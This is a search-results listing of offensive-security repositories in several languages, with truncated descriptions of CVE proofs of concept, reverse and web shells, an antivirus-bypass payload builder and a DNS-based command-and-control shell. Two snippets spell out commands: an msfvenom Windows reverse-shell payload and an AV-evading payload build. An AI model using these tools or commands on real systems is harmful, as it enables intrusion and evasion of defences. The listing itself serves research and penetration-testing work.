34849 matches found
Reverse_DNS_Shell
DNShell v1.7 Description: A Python Reverse Shell that uses DNS as the C2 channel. Requires: dnslib dnspython pycrypto Gotchyas: don't forget to change your HOST don't forget to change your SECRET key run server first Moar Info: http://lockboxx.blogspot.com/2015/01/python-reverse-dns-shell.html...
CVE-2025-55182
CVE-2025-55182 Este repositorio contiene documentación relacionada con la vulnerabilidad CVE-2025-55182 React2Shell La documentación está disponible: como sitio web: https://memergamer.github.io/CVE-2025-55182/ como PDF main.pdf: https://github.com/MemerGamer/CVE-2025-55182/releases...
bugstropics
Hunting Bugs in the Tropics This is a repo with the slides used in my presentation "Hunting Bugs in the Tropics" at DEFCON30. It includes the Python script used to calculate the support password based on the private key obtained by breaking Aruba support's EC public key, due to its weak size 64...
gerapy-cve-2021-43857
Gerapy CVE-2021-43857 RCE autenticado Este repositorio contiene una prueba de concepto del exploit para CVE-2021-43857 , una vulnerabilidad de ejecución remota de código que afecta a Gerapy -p -L -P Requisitos 1. Python 3.x 2. requests y pyfiglet pip install requests pyfiglet 3. Netcat nc...
nmapAutomator
nmapAutomator A script you can run in the background! Summary The main goal for this script is to automate the process of enumeration & recon that is run every time, and instead focus our attention on real pentesting. This will ensure two things: 1. Automate nmap scans. 2. Always have some recon...
WHS3_vulhub
CVE-2017-8386: Evasión de la sandbox de git-shell para PoC de RCE 정수진@suz1n Resumen Git-shell proporciona un entorno que solo permite comandos git restringidos a través de SSH. Sin embargo, en versiones específicas de git-shell como la 2.12.2 existe una vulnerabilidad CVE-2017-8386 que permite...
AVBypass
antivirus bypass protection requirements golang installed usage root@kitploit: 1 - create your payload go run create.go e.g: go run create.go 1.1.1.1 443 SecRetkira https://www.youtube.com/watch?v=Rv4VzpGCEEM 2 - in output folder you will find shell.go compile it go build shell.go 3 - now you hav...
shellshock
shellshock Scripts asociados con la vulnerabilidad de análisis de funciones EVN de bourne shell CVE-2014-6271 dhcpmon.py - Este script monitorea las tramas DHCP en busca de caracteres potencialmente maliciosos dentro de los campos de respuesta BOOTP y DHCP...
ShellPop
ShellPop Acerca de ShellPop se trata de generar shells. Con esta herramienta puedes crear comandos de shell reversa o bind de manera fácil y sofisticada para ayudarte durante las pruebas de penetración. ¡No pierdas más tiempo con archivos .txt almacenando tus shells reversas! Instalación Se...
CVE-2024-47533-PoC
CVE-2024-47533 – Omisión de Autenticación en XMLRPC de Cobbler → Reverse Shell RCE sin Autenticación 📌 Resumen Este repositorio contiene un Exploit de Prueba de Concepto PoC para CVE-2024-47533 , una omisión crítica de autenticación en la API XMLRPC de Cobbler que conduce a ejecución remota de...
tinyshell
tinyshell Small PHP shell, Controlled by Python Client , connecting over protocol method features connect with direct session with no need for reverse connection . support password protection . can be binded to any file with no damage . using GET/POST request with error handling . usage the proje...
CVE-2024-29510
Original research and POC code: https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/ NOTE: I have made no changes to the POC apart from the command executed. Full credit goes to Thomas Rinsma @ Codean Labs for their amazing research and POC. Local Scenario 1...
CVE-2022-37042
CVE-2022-37042 Plantilla armada de Nuclei para Zimbra CVE-2022-37042 ruta del shell: /public/formatter.jsp Nuclei en sí: https://github.com/projectdiscovery/nuclei el shell tiene una entrada oculta con opacidad 0, así que simplemente pasa el ratón sobre ella, escribe el comando y pulsa la tecla...
CVE-2023-42793
CVE-2023-42793 JetBrains TeamCity before 2023.05.4 is vulnerable to authentication bypass leading to RCE Usage To get a reverse shell root@kitploit: python3 exploit.py References https://blog.jetbrains.com/teamcity/2023/09/cve-2023-42793-vulnerability-post-mortem/...
CVE-2023-4220
RCE para Chamilo LMS CVE-2023-4220 utilizando una Web Shell Este proyecto automatiza la explotación de la vulnerabilidad de ejecución remota de código CVE-2023-4220 encontrada en Chamilo LMS. Utilizando una web shell, la herramienta facilita la explotación automatizada de la vulnerabilidad para...
CVE-2015-8351
gwollebuster 此脚本用于利用 WordPress 旧版插件 gwolle 的漏洞 使用方法: ./gwollebuster.py 第一个参数 = 安装了 gwolle 的 WordPress 目标 URL 第二个参数 = 你的 IP 第三个参数 = 用于反向 shell 的监听端口 示例: ./gwollebuster.py http://vulnpress.com/ 192.168.1.5 1234 此脚本将生成 PHP 反向 shell 脚本并绑定简易服务器, 因此你需要在第一个终端打开两个新终端并监听 netcat,然后使用 curl 命令发起请求,...
CVE-2024-52402
🚀 Exploit para CVE-2024-52402: Plugin WordPress Exclusive Content Password Protect -un -p 🛠️ Opciones...
ForgottenButNotGone
Olvidados pero no desaparecidos Este repositorio contiene scripts de prueba de concepto para las vulnerabilidades presentadas en la charla "Olvidados pero no desaparecidos: RCE no autenticados y LPE en servicios Linux heredados" de Black Hat USA 2026 y DEF CON 34. CVE-2026-28372 Escalada de...
CVE-2020-0796
CVE-2020-0796 Explicación de CVE-2020-0796 e investigación de la vulnerabilidad para el proyecto del trimestre CENG325 para principiantes ¿Cómo explotar? Generación de payload de usuario para reverse shell: msfvenom -a x64 --platform windows -p windows/x64/shellreversetcp LHOST= LPORT=5555 -f...